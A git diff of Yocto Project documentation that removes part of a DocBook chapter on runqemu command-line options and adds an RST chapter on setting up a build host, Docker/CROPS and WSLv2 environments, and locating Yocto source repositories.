- After running the command, you must then point the
- <filename>runqemu</filename>
- script to the extracted directory instead of a root
- filesystem image file.
- See the
- "<link linkend='qemu-running-under-a-network-file-system-nfs-server'>Running Under a Network File System (NFS) Server</link>"
- section for more information.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
- </section>
-
- <section id='qemu-dev-command-line-syntax'>
- <title>QEMU Command-Line Syntax</title>
-
- <para>
- The basic <filename>runqemu</filename> command syntax is as
- follows:
- <literallayout class='monospaced'>
- $ runqemu [<replaceable>option</replaceable> ] [...]
- </literallayout>
- Based on what you provide on the command line,
- <filename>runqemu</filename> does a good job of figuring out what
- you are trying to do.
- For example, by default, QEMU looks for the most recently built
- image according to the timestamp when it needs to look for an
- image.
- Minimally, through the use of options, you must provide either
- a machine name, a virtual machine image
- (<filename>*wic.vmdk</filename>), or a kernel image
- (<filename>*.bin</filename>).
- </para>
-
- <para>
- Following is the command-line help output for the
- <filename>runqemu</filename> command:
- <literallayout class='monospaced'>
- $ runqemu --help
-
- Usage: you can run this script with any valid combination
- of the following environment variables (in any order):
- KERNEL - the kernel image file to use
- ROOTFS - the rootfs image file or nfsroot directory to use
- MACHINE - the machine name (optional, autodetected from KERNEL filename if unspecified)
- Simplified QEMU command-line options can be passed with:
- nographic - disable video console
- serial - enable a serial console on /dev/ttyS0
- slirp - enable user networking, no root privileges is required
- kvm - enable KVM when running x86/x86_64 (VT-capable CPU required)
- kvm-vhost - enable KVM with vhost when running x86/x86_64 (VT-capable CPU required)
- publicvnc - enable a VNC server open to all hosts
- audio - enable audio
- [*/]ovmf* - OVMF firmware file or base name for booting with UEFI
- tcpserial=&lt;port&gt; - specify tcp serial port number
- biosdir=&lt;dir&gt; - specify custom bios dir
- biosfilename=&lt;filename&gt; - specify bios filename
- qemuparams=&lt;xyz&gt; - specify custom parameters to QEMU
- bootparams=&lt;xyz&gt; - specify custom kernel parameters during boot
- help, -h, --help: print this text
-
- Examples:
- runqemu
- runqemu qemuarm
- runqemu tmp/deploy/images/qemuarm
- runqemu tmp/deploy/images/qemux86/&lt;qemuboot.conf&gt;
- runqemu qemux86-64 core-image-sato ext4
- runqemu qemux86-64 wic-image-minimal wic
- runqemu path/to/bzImage-qemux86.bin path/to/nfsrootdir/ serial
- runqemu qemux86 iso/hddimg/wic.vmdk/wic.qcow2/wic.vdi/ramfs/cpio.gz...
- runqemu qemux86 qemuparams="-m 256"
- runqemu qemux86 bootparams="psplash=false"
- runqemu path/to/&lt;image&gt;-&lt;machine&gt;.wic
- runqemu path/to/&lt;image&gt;-&lt;machine&gt;.wic.vmdk
- </literallayout>
- </para>
- </section>
-
- <section id='qemu-dev-runqemu-command-line-options'>
- <title><filename>runqemu</filename> Command-Line Options</title>
-
- <para>
- Following is a description of <filename>runqemu</filename>
- options you can provide on the command line:
- <note><title>Tip</title>
- If you do provide some "illegal" option combination or perhaps
- you do not provide enough in the way of options,
- <filename>runqemu</filename> provides appropriate error
- messaging to help you correct the problem.
- </note>
- <itemizedlist>
- <listitem><para>
- <replaceable>QEMUARCH</replaceable>:
- The QEMU machine architecture, which must be "qemuarm",
- "qemuarm64", "qemumips", "qemumips64", "qemuppc",
- "qemux86", or "qemux86-64".
- </para></listitem>
- <listitem><para>
- <filename><replaceable>VM</replaceable></filename>:
- The virtual machine image, which must be a
- <filename>.wic.vmdk</filename> file.
- Use this option when you want to boot a
- <filename>.wic.vmdk</filename> image.
- The image filename you provide must contain one of the
- following strings: "qemux86-64", "qemux86", "qemuarm",
- "qemumips64", "qemumips", "qemuppc", or "qemush4".
- </para></listitem>
- <listitem><para>
- <replaceable>ROOTFS</replaceable>:
- A root filesystem that has one of the following
- filetype extensions: "ext2", "ext3", "ext4", "jffs2",
- "nfs", or "btrfs".
- If the filename you provide for this option uses “nfsâ€, it
- must provide an explicit root filesystem path.
- </para></listitem>
- <listitem><para>
- <replaceable>KERNEL</replaceable>:
- A kernel image, which is a <filename>.bin</filename> file.
- When you provide a <filename>.bin</filename> file,
- <filename>runqemu</filename> detects it and assumes the
- file is a kernel image.
- </para></listitem>
- <listitem><para>
- <replaceable>MACHINE</replaceable>:
- The architecture of the QEMU machine, which must be one
- of the following: "qemux86", "qemux86-64", "qemuarm",
- "qemuarm64", "qemumips", “qemumips64", or "qemuppc".
- The <replaceable>MACHINE</replaceable> and
- <replaceable>QEMUARCH</replaceable> options are basically
- identical.
- If you do not provide a <replaceable>MACHINE</replaceable>
- option, <filename>runqemu</filename> tries to determine
- it based on other options.
- </para></listitem>
- <listitem><para>
- <filename>ramfs</filename>:
- Indicates you are booting an initial RAM disk (initramfs)
- image, which means the <filename>FSTYPE</filename> is
- <filename>cpio.gz</filename>.
- </para></listitem>
- <listitem><para>
- <filename>iso</filename>:
- Indicates you are booting an ISO image, which means the
- <filename>FSTYPE</filename> is
- <filename>.iso</filename>.
- </para></listitem>
- <listitem><para>
- <filename>nographic</filename>:
- Disables the video console, which sets the console to
- "ttys0".
- This option is useful when you have logged into a server
- and you do not want to disable forwarding from the
- X Window System (X11) to your workstation or laptop.
- </para></listitem>
- <listitem><para>
- <filename>serial</filename>:
- Enables a serial console on
- <filename>/dev/ttyS0</filename>.
- </para></listitem>
- <listitem><para>
- <filename>biosdir</filename>:
- Establishes a custom directory for BIOS, VGA BIOS and
- keymaps.
- </para></listitem>
- <listitem><para>
- <filename>biosfilename</filename>:
- Establishes a custom BIOS name.
- </para></listitem>
- <listitem><para>
- <filename>qemuparams=\"<replaceable>xyz</replaceable>\"</filename>:
- Specifies custom QEMU parameters.
- Use this option to pass options other than the simple
- "kvm" and "serial" options.
- </para></listitem>
- <listitem><para><filename>bootparams=\"<replaceable>xyz</replaceable>\"</filename>:
- Specifies custom boot parameters for the kernel.
- </para></listitem>
- <listitem><para>
- <filename>audio</filename>:
- Enables audio in QEMU.
- The <replaceable>MACHINE</replaceable> option must be
- either "qemux86" or "qemux86-64" in order for audio to be
- enabled.
- Additionally, the <filename>snd_intel8x0</filename>
- or <filename>snd_ens1370</filename> driver must be
- installed in linux guest.
- </para></listitem>
- <listitem><para>
- <filename>slirp</filename>:
- Enables "slirp" networking, which is a different way
- of networking that does not need root access
- but also is not as easy to use or comprehensive
- as the default.
- </para></listitem>
- <listitem><para id='kvm-cond'>
- <filename>kvm</filename>:
- Enables KVM when running "qemux86" or "qemux86-64"
- QEMU architectures.
- For KVM to work, all the following conditions must be met:
- <itemizedlist>
- <listitem><para>
- Your <replaceable>MACHINE</replaceable> must be either
-qemux86" or "qemux86-64".
- </para></listitem>
- <listitem><para>
- Your build host has to have the KVM modules
- installed, which are
- <filename>/dev/kvm</filename>.
- </para></listitem>
- <listitem><para>
- The build host <filename>/dev/kvm</filename>
- directory has to be both writable and readable.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <filename>kvm-vhost</filename>:
- Enables KVM with VHOST support when running "qemux86"
- or "qemux86-64" QEMU architectures.
- For KVM with VHOST to work, the following conditions must
- be met:
- <itemizedlist>
- <listitem><para>
- <link linkend='kvm-cond'>kvm</link> option
- conditions must be met.
- </para></listitem>
- <listitem><para>
- Your build host has to have virtio net device, which
- are <filename>/dev/vhost-net</filename>.
- </para></listitem>
- <listitem><para>
- The build host <filename>/dev/vhost-net</filename>
- directory has to be either readable or writable
- and “slirp-enabledâ€.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <filename>publicvnc</filename>:
- Enables a VNC server open to all hosts.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-start.rst b/documentation/dev-manual/dev-manual-start.rst
new file mode 100644
index 0000000000..6a330d4a32
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-start.rst
@@ -0,0 +1,926 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************************
+Setting Up to Use the Yocto Project
+***********************************
+
+This chapter provides guidance on how to prepare to use the Yocto
+Project. You can learn about creating a team environment to develop
+using the Yocto Project, how to set up a :ref:`build
+host <dev-manual/dev-manual-start:preparing the build host>`, how to locate
+Yocto Project source repositories, and how to create local Git
+repositories.
+
+.. _usingpoky-changes-collaborate:
+
+Creating a Team Development Environment
+=======================================
+
+It might not be immediately clear how you can use the Yocto Project in a
+team development environment, or how to scale it for a large team of
+developers. You can adapt the Yocto Project to many different use cases
+and scenarios; however, this flexibility could cause difficulties if you
+are trying to create a working setup that scales effectively.
+
+To help you understand how to set up this type of environment, this
+section presents a procedure that gives you information that can help
+you get the results you want. The procedure is high-level and presents
+some of the project's most successful experiences, practices, solutions,
+and available technologies that have proved to work well in the past;
+however, keep in mind, the procedure here is simply a starting point.
+You can build off these steps and customize the procedure to fit any
+particular working environment and set of practices.
+
+1. *Determine Who is Going to be Developing:* You first need to
+ understand who is going to be doing anything related to the Yocto
+ Project and determine their roles. Making this determination is
+ essential to completing subsequent steps, which are to get your
+ equipment together and set up your development environment's
+ hardware topology.
+
+ The following roles exist:
+
+ - *Application Developer:* This type of developer does application
+ level work on top of an existing software stack.
+
+ - *Core System Developer:* This type of developer works on the
+ contents of the operating system image itself.
+
+ - *Build Engineer:* This type of developer manages Autobuilders and
+ releases. Depending on the specifics of the environment, not all
+ situations might need a Build Engineer.
+
+ - *Test Engineer:* This type of developer creates and manages
+ automated tests that are used to ensure all application and core
+ system development meets desired quality standards.
+
+2. *Gather the Hardware:* Based on the size and make-up of the team,
+ get the hardware together. Ideally, any development, build, or test
+ engineer uses a system that runs a supported Linux distribution.
+ These systems, in general, should be high performance (e.g. dual,
+ six-core Xeons with 24 Gbytes of RAM and plenty of disk space). You
+ can help ensure efficiency by having any machines used for testing
+ or that run Autobuilders be as high performance as possible.
+
+ .. note::
+
+ Given sufficient processing power, you might also consider
+ building Yocto Project development containers to be run under
+ Docker, which is described later.
+
+3. *Understand the Hardware Topology of the Environment:* Once you
+ understand the hardware involved and the make-up of the team, you
+ can understand the hardware topology of the development environment.
+ You can get a visual idea of the machines and their roles across the
+ development environment.
+
+4. *Use Git as Your Source Control Manager (SCM):* Keeping your
+ :term:`Metadata` (i.e. recipes,
+ configuration files, classes, and so forth) and any software you are
+ developing under the control of an SCM system that is compatible
+ with the OpenEmbedded build system is advisable. Of all of the SCMs
+ supported by BitBake, the Yocto Project team strongly recommends using
+ :ref:`overview-manual/overview-manual-development-environment:git`.
+ Git is a distributed system
+ that is easy to back up, allows you to work remotely, and then
+ connects back to the infrastructure.
+
+ .. note::
+
+ For information about BitBake, see the
+ :doc:`bitbake:index`.
+
+ It is relatively easy to set up Git services and create
+ infrastructure like :yocto_git:`/`, which is based on
+ server software called ``gitolite`` with ``cgit`` being used to
+ generate the web interface that lets you view the repositories. The
+ ``gitolite`` software identifies users using SSH keys and allows
+ branch-based access controls to repositories that you can control as
+ little or as much as necessary.
+
+ .. note::
+
+ The setup of these services is beyond the scope of this manual.
+ However, sites such as the following exist that describe how to
+ perform setup:
+
+ - `Gitolite <https://gitolite.com>`__: Information for
+ ``gitolite``.
+
+ - `Interfaces, frontends, and
+ tools <https://git.wiki.kernel.org/index.php/Interfaces,_frontends,_and_tools>`__:
+ Documentation on how to create interfaces and frontends for
+ Git.
+
+5. *Set up the Application Development Machines:* As mentioned earlier,
+ application developers are creating applications on top of existing
+ software stacks. Following are some best practices for setting up
+ machines used for application development:
+
+ - Use a pre-built toolchain that contains the software stack
+ itself. Then, develop the application code on top of the stack.
+ This method works well for small numbers of relatively isolated
+ applications.
+
+ - Keep your cross-development toolchains updated. You can do this
+ through provisioning either as new toolchain downloads or as
+ updates through a package update mechanism using ``opkg`` to
+ provide updates to an existing toolchain. The exact mechanics of
+ how and when to do this depend on local policy.
+
+ - Use multiple toolchains installed locally into different
+ locations to allow development across versions.
+
+6. *Set up the Core Development Machines:* As mentioned earlier, core
+ developers work on the contents of the operating system itself.
+ Following are some best practices for setting up machines used for
+ developing images:
+
+ - Have the :term:`OpenEmbedded Build System` available on
+ the developer workstations so developers can run their own builds
+ and directly rebuild the software stack.
+
+ - Keep the core system unchanged as much as possible and do your
+ work in layers on top of the core system. Doing so gives you a
+ greater level of portability when upgrading to new versions of
+ the core system or Board Support Packages (BSPs).
+
+ - Share layers amongst the developers of a particular project and
+ contain the policy configuration that defines the project.
+
+7. *Set up an Autobuilder:* Autobuilders are often the core of the
+ development environment. It is here that changes from individual
+ developers are brought together and centrally tested. Based on this
+ automated build and test environment, subsequent decisions about
+ releases can be made. Autobuilders also allow for "continuous
+ integration" style testing of software components and regression
+ identification and tracking.
+
+ See ":yocto_ab:`Yocto Project Autobuilder <>`" for more
+ information and links to buildbot. The Yocto Project team has found
+ this implementation works well in this role. A public example of
+ this is the Yocto Project Autobuilders, which the Yocto Project team
+ uses to test the overall health of the project.
+
+ The features of this system are:
+
+ - Highlights when commits break the build.
+
+ - Populates an :ref:`sstate
+ cache <overview-manual/overview-manual-concepts:shared state cache>` from which
+ developers can pull rather than requiring local builds.
+
+ - Allows commit hook triggers, which trigger builds when commits
+ are made.
+
+ - Allows triggering of automated image booting and testing under
+ the QuickEMUlator (QEMU).
+
+ - Supports incremental build testing and from-scratch builds.
+
+ - Shares output that allows developer testing and historical
+ regression investigation.
+
+ - Creates output that can be used for releases.
+
+ - Allows scheduling of builds so that resources can be used
+ efficiently.
+
+8. *Set up Test Machines:* Use a small number of shared, high
+ performance systems for testing purposes. Developers can use these
+ systems for wider, more extensive testing while they continue to
+ develop locally using their primary development system.
+
+9. *Document Policies and Change Flow:* The Yocto Project uses a
+ hierarchical structure and a pull model. Scripts exist to create and
+ send pull requests (i.e. ``create-pull-request`` and
+ ``send-pull-request``). This model is in line with other open source
+ projects where maintainers are responsible for specific areas of the
+ project and a single maintainer handles the final "top-of-tree"
+ merges.
+
+ .. note::
+
+ You can also use a more collective push model. The ``gitolite``
+ software supports both the push and pull models quite easily.
+
+ As with any development environment, it is important to document the
+ policy used as well as any main project guidelines so they are
+ understood by everyone. It is also a good idea to have
+ well-structured commit messages, which are usually a part of a
+ project's guidelines. Good commit messages are essential when
+ looking back in time and trying to understand why changes were made.
+
+ If you discover that changes are needed to the core layer of the
+ project, it is worth sharing those with the community as soon as
+ possible. Chances are if you have discovered the need for changes,
+ someone else in the community needs them also.
+
+10. *Development Environment Summary:* Aside from the previous steps,
+ some best practices exist within the Yocto Project development
+ environment. Consider the following:
+
+ - Use :ref:`overview-manual/overview-manual-development-environment:git` as the source control
+ system.
+
+ - Maintain your Metadata in layers that make sense for your
+ situation. See the ":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+ section in the Yocto Project Overview and Concepts Manual and the
+ ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section for more information on layers.
+
+ - Separate the project's Metadata and code by using separate Git
+ repositories. See the ":ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`"
+ section in the Yocto Project Overview and Concepts Manual for
+ information on these repositories. See the "`Locating Yocto
+ Project Source Files <#locating-yocto-project-source-files>`__"
+ section for information on how to set up local Git repositories
+ for related upstream Yocto Project Git repositories.
+
+ - Set up the directory for the shared state cache
+ (:term:`SSTATE_DIR`) where
+ it makes sense. For example, set up the sstate cache on a system
+ used by developers in the same organization and share the same
+ source directories on their machines.
+
+ - Set up an Autobuilder and have it populate the sstate cache and
+ source directories.
+
+ - The Yocto Project community encourages you to send patches to the
+ project to fix bugs or add features. If you do submit patches,
+ follow the project commit guidelines for writing good commit
+ messages. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+ section.
+
+ - Send changes to the core sooner than later as others are likely
+ to run into the same issues. For some guidance on mailing lists
+ to use, see the list in the
+ ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+ section. For a description
+ of the available mailing lists, see the ":ref:`resources-mailinglist`" section in
+ the Yocto Project Reference Manual.
+
+.. _dev-preparing-the-build-host:
+
+Preparing the Build Host
+========================
+
+This section provides procedures to set up a system to be used as your
+:term:`Build Host` for
+development using the Yocto Project. Your build host can be a native
+Linux machine (recommended), it can be a machine (Linux, Mac, or
+Windows) that uses `CROPS <https://github.com/crops/poky-container>`__,
+which leverages `Docker Containers <https://www.docker.com/>`__ or it
+can be a Windows machine capable of running Windows Subsystem For Linux
+v2 (WSL).
+
+.. note::
+
+ The Yocto Project is not compatible with
+ `Windows Subsystem for Linux v1 <https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux>`__.
+ It is compatible but not officially supported nor validated with
+ WSLv2. If you still decide to use WSL please upgrade to
+ `WSLv2 <https://docs.microsoft.com/en-us/windows/wsl/install-win10>`__.
+
+Once your build host is set up to use the Yocto Project, further steps
+are necessary depending on what you want to accomplish. See the
+following references for information on how to prepare for Board Support
+Package (BSP) development and kernel development:
+
+- *BSP Development:* See the ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+ section in the Yocto Project Board Support Package (BSP) Developer's
+ Guide.
+
+- *Kernel Development:* See the ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+Setting Up a Native Linux Host
+------------------------------
+
+Follow these steps to prepare a native Linux machine as your Yocto
+Project Build Host:
+
+1. *Use a Supported Linux Distribution:* You should have a reasonably
+ current Linux-based host system. You will have the best results with
+ a recent release of Fedora, openSUSE, Debian, Ubuntu, RHEL or CentOS
+ as these releases are frequently tested against the Yocto Project and
+ officially supported. For a list of the distributions under
+ validation and their status, see the ":ref:`Supported Linux
+ Distributions <detailed-supported-distros>`"
+ section in the Yocto Project Reference Manual and the wiki page at
+ :yocto_wiki:`Distribution Support </wiki/Distribution_Support>`.
+
+2. *Have Enough Free Memory:* Your system should have at least 50 Gbytes
+ of free disk space for building images.
+
+3. *Meet Minimal Version Requirements:* The OpenEmbedded build system
+ should be able to run on any modern distribution that has the
+ following versions for Git, tar, Python and gcc.
+
+ - Git 1.8.3.1 or greater
+
+ - tar 1.28 or greater
+
+ - Python 3.5.0 or greater.
+
+ - gcc 5.0 or greater.
+
+ If your build host does not meet any of these three listed version
+ requirements, you can take steps to prepare the system so that you
+ can still use the Yocto Project. See the
+ ":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+ section in the Yocto Project Reference Manual for information.
+
+4. *Install Development Host Packages:* Required development host
+ packages vary depending on your build host and what you want to do
+ with the Yocto Project. Collectively, the number of required packages
+ is large if you want to be able to cover all cases.
+
+ For lists of required packages for all scenarios, see the
+ ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+ section in the Yocto Project Reference Manual.
+
+Once you have completed the previous steps, you are ready to continue
+using a given development path on your native Linux machine. If you are
+going to use BitBake, see the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section. If you are going
+to use the Extensible SDK, see the ":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you want to work on the kernel, see the :doc:`../kernel-dev/kernel-dev`. If you are going to use
+Toaster, see the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+.. _setting-up-to-use-crops:
+
+Setting Up to Use CROss PlatformS (CROPS)
+-----------------------------------------
+
+With `CROPS <https://github.com/crops/poky-container>`__, which
+leverages `Docker Containers <https://www.docker.com/>`__, you can
+create a Yocto Project development environment that is operating system
+agnostic. You can set up a container in which you can develop using the
+Yocto Project on a Windows, Mac, or Linux machine.
+
+Follow these general steps to prepare a Windows, Mac, or Linux machine
+as your Yocto Project build host:
+
+1. *Determine What Your Build Host Needs:*
+ `Docker <https://www.docker.com/what-docker>`__ is a software
+ container platform that you need to install on the build host.
+ Depending on your build host, you might have to install different
+ software to support Docker containers. Go to the Docker installation
+ page and read about the platform requirements in "`Supported
+ Platforms <https://docs.docker.com/engine/install/#supported-platforms>`__"
+ your build host needs to run containers.
+
+2. *Choose What To Install:* Depending on whether or not your build host
+ meets system requirements, you need to install "Docker CE Stable" or
+ the "Docker Toolbox". Most situations call for Docker CE. However, if
+ you have a build host that does not meet requirements (e.g.
+ Pre-Windows 10 or Windows 10 "Home" version), you must install Docker
+ Toolbox instead.
+
+3. *Go to the Install Site for Your Platform:* Click the link for the
+ Docker edition associated with your build host's native software. For
+ example, if your build host is running Microsoft Windows Version 10
+ and you want the Docker CE Stable edition, click that link under
+ "Supported Platforms".
+
+4. *Install the Software:* Once you have understood all the
+ pre-requisites, you can download and install the appropriate
+ software. Follow the instructions for your specific machine and the
+ type of the software you need to install:
+
+ - Install `Docker CE for
+ Windows <https://docs.docker.com/docker-for-windows/install/#install-docker-desktop-on-windows>`__
+ for Windows build hosts that meet requirements.
+
+ - Install `Docker CE for
+ MacOs <https://docs.docker.com/docker-for-mac/install/#install-and-run-docker-desktop-on-mac>`__
+ for Mac build hosts that meet requirements.
+
+ - Install `Docker Toolbox for
+ Windows <https://docs.docker.com/toolbox/toolbox_install_windows/>`__
+ for Windows build hosts that do not meet Docker requirements.
+
+ - Install `Docker Toolbox for
+ MacOS <https://docs.docker.com/toolbox/toolbox_install_mac/>`__
+ for Mac build hosts that do not meet Docker requirements.
+
+ - Install `Docker CE for
+ CentOS <https://docs.docker.com/install/linux/docker-ce/centos/>`__
+ for Linux build hosts running the CentOS distribution.
+
+ - Install `Docker CE for
+ Debian <https://docs.docker.com/install/linux/docker-ce/debian/>`__
+ for Linux build hosts running the Debian distribution.
+
+ - Install `Docker CE for
+ Fedora <https://docs.docker.com/install/linux/docker-ce/fedora/>`__
+ for Linux build hosts running the Fedora distribution.
+
+ - Install `Docker CE for
+ Ubuntu <https://docs.docker.com/install/linux/docker-ce/ubuntu/>`__
+ for Linux build hosts running the Ubuntu distribution.
+
+5. *Optionally Orient Yourself With Docker:* If you are unfamiliar with
+ Docker and the container concept, you can learn more here -
+ https://docs.docker.com/get-started/.
+
+6. *Launch Docker or Docker Toolbox:* You should be able to launch
+ Docker or the Docker Toolbox and have a terminal shell on your
+ development host.
+
+7. *Set Up the Containers to Use the Yocto Project:* Go to
+ https://github.com/crops/docker-win-mac-docs/wiki and follow
+ the directions for your particular build host (i.e. Linux, Mac, or
+ Windows).
+
+ Once you complete the setup instructions for your machine, you have
+ the Poky, Extensible SDK, and Toaster containers available. You can
+ click those links from the page and learn more about using each of
+ those containers.
+
+Once you have a container set up, everything is in place to develop just
+as if you were running on a native Linux machine. If you are going to
+use the Poky container, see the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section. If you are going to use the Extensible SDK container, see the
+":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you are going to use the Toaster container, see
+the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+.. _setting-up-to-use-wsl:
+
+Setting Up to Use Windows Subsystem For Linux (WSLv2)
+-----------------------------------------------------
+
+With `Windows Subsystem for Linux
+(WSLv2) <https://docs.microsoft.com/en-us/windows/wsl/wsl2-about>`__,
+you can create a Yocto Project development environment that allows you
+to build on Windows. You can set up a Linux distribution inside Windows
+in which you can develop using the Yocto Project.
+
+Follow these general steps to prepare a Windows machine using WSLv2 as
+your Yocto Project build host:
+
+1. *Make sure your Windows 10 machine is capable of running WSLv2:*
+ WSLv2 is only available for Windows 10 builds > 18917. To check which
+ build version you are running, you may open a command prompt on
+ Windows and execute the command "ver".
+ ::
+
+ C:\Users\myuser> ver
+
+ Microsoft Windows [Version 10.0.19041.153]
+
+ If your build is capable of running
+ WSLv2 you may continue, for more information on this subject or
+ instructions on how to upgrade to WSLv2 visit `Windows 10
+ WSLv2 <https://docs.microsoft.com/en-us/windows/wsl/wsl2-install>`__
+
+2. *Install the Linux distribution of your choice inside Windows 10:*
+ Once you know your version of Windows 10 supports WSLv2, you can
+ install the distribution of your choice from the Microsoft Store.
+ Open the Microsoft Store and search for Linux. While there are
+ several Linux distributions available, the assumption is that your
+ pick will be one of the distributions supported by the Yocto Project
+ as stated on the instructions for using a native Linux host. After
+ making your selection, simply click "Get" to download and install the
+ distribution.
+
+3. *Check your Linux distribution is using WSLv2:* Open a Windows
+ PowerShell and run:
+ ::
+
+ C:\WINDOWS\system32> wsl -l -v
+ NAME STATE VERSION
+ *Ubuntu Running 2
+
+ Note the version column which says the WSL version
+ being used by your distribution, on compatible systems, this can be
+ changed back at any point in time.
+
+4. *Optionally Orient Yourself on WSL:* If you are unfamiliar with WSL,
+ you can learn more here -
+ https://docs.microsoft.com/en-us/windows/wsl/wsl2-about.
+
+5. *Launch your WSL Distibution:* From the Windows start menu simply
+ launch your WSL distribution just like any other application.
+
+6. *Optimize your WSLv2 storage often:* Due to the way storage is
+ handled on WSLv2, the storage space used by the undelying Linux
+ distribution is not reflected immedately, and since bitbake heavily
+ uses storage, after several builds, you may be unaware you are
+ running out of space. WSLv2 uses a VHDX file for storage, this issue
+ can be easily avoided by manually optimizing this file often, this
+ can be done in the following way:
+
+ 1. *Find the location of your VHDX file:* First you need to find the
+ distro app package directory, to achieve this open a Windows
+ Powershell as Administrator and run:
+ ::
+
+ C:\WINDOWS\system32> Get-AppxPackage -Name "*Ubuntu*" | Select PackageFamilyName
+ PackageFamilyName
+ -----------------
+ CanonicalGroupLimited.UbuntuonWindows_79abcdefgh
+
+
+ You should now
+ replace the PackageFamilyName and your user on the following path
+ to find your VHDX file:
+ ::
+
+ ls C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\
+ Mode LastWriteTime Length Name
+ -a---- 3/14/2020 9:52 PM 57418973184 ext4.vhdx
+
+ Your VHDX file path is:
+ ``C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx``
+
+ 2. *Optimize your VHDX file:* Open a Windows Powershell as
+ Administrator to optimize your VHDX file, shutting down WSL first:
+ ::
+
+ C:\WINDOWS\system32> wsl --shutdown
+ C:\WINDOWS\system32> optimize-vhd -Path C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx -Mode full
+
+ A progress bar should be shown while optimizing the
+ VHDX file, and storage should now be reflected correctly on the
+ Windows Explorer.
+
+.. note::
+
+ The current implementation of WSLv2 does not have out-of-the-box
+ access to external devices such as those connected through a USB
+ port, but it automatically mounts your ``C:`` drive on ``/mnt/c/``
+ (and others), which you can use to share deploy artifacts to be later
+ flashed on hardware through Windows, but your build directory should
+ not reside inside this mountpoint.
+
+Once you have WSLv2 set up, everything is in place to develop just as if
+you were running on a native Linux machine. If you are going to use the
+Extensible SDK container, see the ":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you are going to use the Toaster container, see
+the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+Locating Yocto Project Source Files
+===================================
+
+This section shows you how to locate, fetch and configure the source
+files you'll need to work with the Yocto Project.
+
+.. note::
+
+ - For concepts and introductory information about Git as it is used
+ in the Yocto Project, see the ":ref:`overview-manual/overview-manual-development-environment:git`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ - For concepts on Yocto Project source repositories, see the
+ ":ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`"
+ section in the Yocto Project Overview and Concepts Manual."
+
+Accessing Source Repositories
+-----------------------------
+
+Working from a copy of the upstream :ref:`dev-manual/dev-manual-start:accessing source repositories` is the
+preferred method for obtaining and using a Yocto Project release. You
+can view the Yocto Project Source Repositories at
+:yocto_git:`/`. In particular, you can find the ``poky``
+repository at :yocto_git:`/cgit.cgi/poky`.
+
+Use the following procedure to locate the latest upstream copy of the
+``poky`` Git repository:
+
+1. *Access Repositories:* Open a browser and go to
+ :yocto_git:`/` to access the GUI-based interface into the
+ Yocto Project source repositories.
+
+2. *Select the Repository:* Click on the repository in which you are
+ interested (e.g. ``poky``).
+
+3. *Find the URL Used to Clone the Repository:* At the bottom of the
+ page, note the URL used to clone that repository
+ (e.g. :yocto_git:`/cgit.cgi/poky`).
+
+ .. note::
+
+ For information on cloning a repository, see the
+ ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" section.
+
+Accessing Index of Releases
+---------------------------
+
+Yocto Project maintains an Index of Releases area that contains related
+files that contribute to the Yocto Project. Rather than Git
+repositories, these files are tarballs that represent snapshots in time
+of a given component.
+
+.. note::
+
+ The recommended method for accessing Yocto Project components is to
+ use Git to clone the upstream repository and work from within that
+ locally cloned repository. The procedure in this section exists
+ should you desire a tarball snapshot of any given component.
+
+Follow these steps to locate and download a particular tarball:
+
+1. *Access the Index of Releases:* Open a browser and go to
+ :yocto_dl:`Index of Releases </releases>`. The
+ list represents released components (e.g. ``bitbake``, ``sato``, and
+ so on).
+
+ .. note::
+
+ The ``yocto`` directory contains the full array of released Poky
+ tarballs. The ``poky`` directory in the Index of Releases was
+ historically used for very early releases and exists now only for
+ retroactive completeness.
+
+2. *Select a Component:* Click on any released component in which you
+ are interested (e.g. ``yocto``).
+
+3. *Find the Tarball:* Drill down to find the associated tarball. For
+ example, click on ``yocto-&DISTRO;`` to view files associated with the
+ Yocto Project &DISTRO; release (e.g.
+ ``&YOCTO_POKY;.tar.bz2``, which is the
+ released Poky tarball).
+
+4. *Download the Tarball:* Click the tarball to download and save a
+ snapshot of the given component.
+
+Using the Downloads Page
+------------------------
+
+The :yocto_home:`Yocto Project Website <>` uses a "RELEASES" page
+from which you can locate and download tarballs of any Yocto Project
+release. Rather than Git repositories, these files represent snapshot
+tarballs similar to the tarballs located in the Index of Releases
